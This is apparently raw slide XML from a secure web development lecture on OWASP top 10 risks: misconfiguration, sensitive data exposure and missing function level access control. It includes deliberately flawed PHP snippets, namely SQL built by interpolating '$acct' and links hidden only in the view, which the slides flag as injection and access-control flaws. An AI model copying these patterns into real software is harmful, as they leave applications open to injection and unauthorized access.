                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>SELECT BALANCE FROM ACCOUNTS WHERE ID='$acct'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangular Callout 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="4038600"/>
            <a:ext cx="6051058" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -1734"/>
              <a:gd name="adj2" fmla="val -88599"/>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Two problems: injection and direct object reference.  The function doesn’t check to make sure that the currently logged in user owns the requested account.  Also applies to static resources like files (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, DB, etc).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3227186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Security misconfiguration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date</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24</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2801814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Security misconfiguration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date</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25</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757537498"/>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C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1389963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Security misconfiguration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date</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26</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982231932"/>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C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Rounded Rectangular Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2514600"/>
            <a:ext cx="4953000" cy="3124200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -2107"/>
              <a:gd name="adj2" fmla="val -79730"/>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Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unpatched OS, database, application server, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Default sample applications still installed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Directory listings enabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stack trace output not shut off</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2404734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Sensitive data exposure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser</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27</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300959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Sensitive data exposure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser</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28</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301523279"/>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Difficult</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="565150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Prevalence</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Uncommon</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FFFF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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2175667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Sensitive data exposure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser</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29</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3949797348"/>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Difficult</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="565150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Prevalence</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Uncommon</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FFFF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Severe</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangular Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2514600"/>
            <a:ext cx="4953000" cy="3124200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -2107"/>
              <a:gd name="adj2" fmla="val -79730"/>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Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Not using SSL for all authenticated pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unsalted or plaintext passwords in the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Weak crypto algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unencrypted backups</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="316167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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List and define the OWASP top 10.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Critique common approaches to attack surface reduction.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compare and contrast STRIDE, DREAD, CIA, and turtle shell approaches to security.</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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3356524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Missing function level access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality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30</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1831519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Missing function level access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality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31</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930980342"/>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Easy</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FF00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Average</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FFB2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2227228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Missing function level access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality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32</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
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="685800"/>
            <a:ext cx="8839200" cy="48768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FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>h2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Current To Do:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>h2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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foreach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>todos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> as $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>todo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) : ]]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>li</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>        [[ if (Authenticator::instance() -&gt; can('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>view_todo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"@@todo/view/{{$todo-&gt;getId()}}@@"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[View]</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 if (Authenticator::instance() -&gt; can('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>edit_todo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"@@todo/edit/{{$todo-&gt;getId()}}@@"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[Edit]</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 if (Authenticator::instance() -&gt; can('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>delete_todo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"@@todo/delete/{{$todo-&gt;getId()}}@@"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[Del]</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>todo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>getDescription</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>()}}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>li</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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endforeach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>; ]]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangular Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="3733800"/>
            <a:ext cx="4648200" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 14120"/>
              <a:gd name="adj2" fmla="val -84274"/>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In the view, we prevent the link to edit something from being shown unless they can edit.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10243414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Missing function level access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality without proper authorization</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33</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
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="685800"/>
            <a:ext cx="8839200" cy="48768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FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>h2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Current To Do:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>h2</a:t>
            </a:r>
            <a:r>
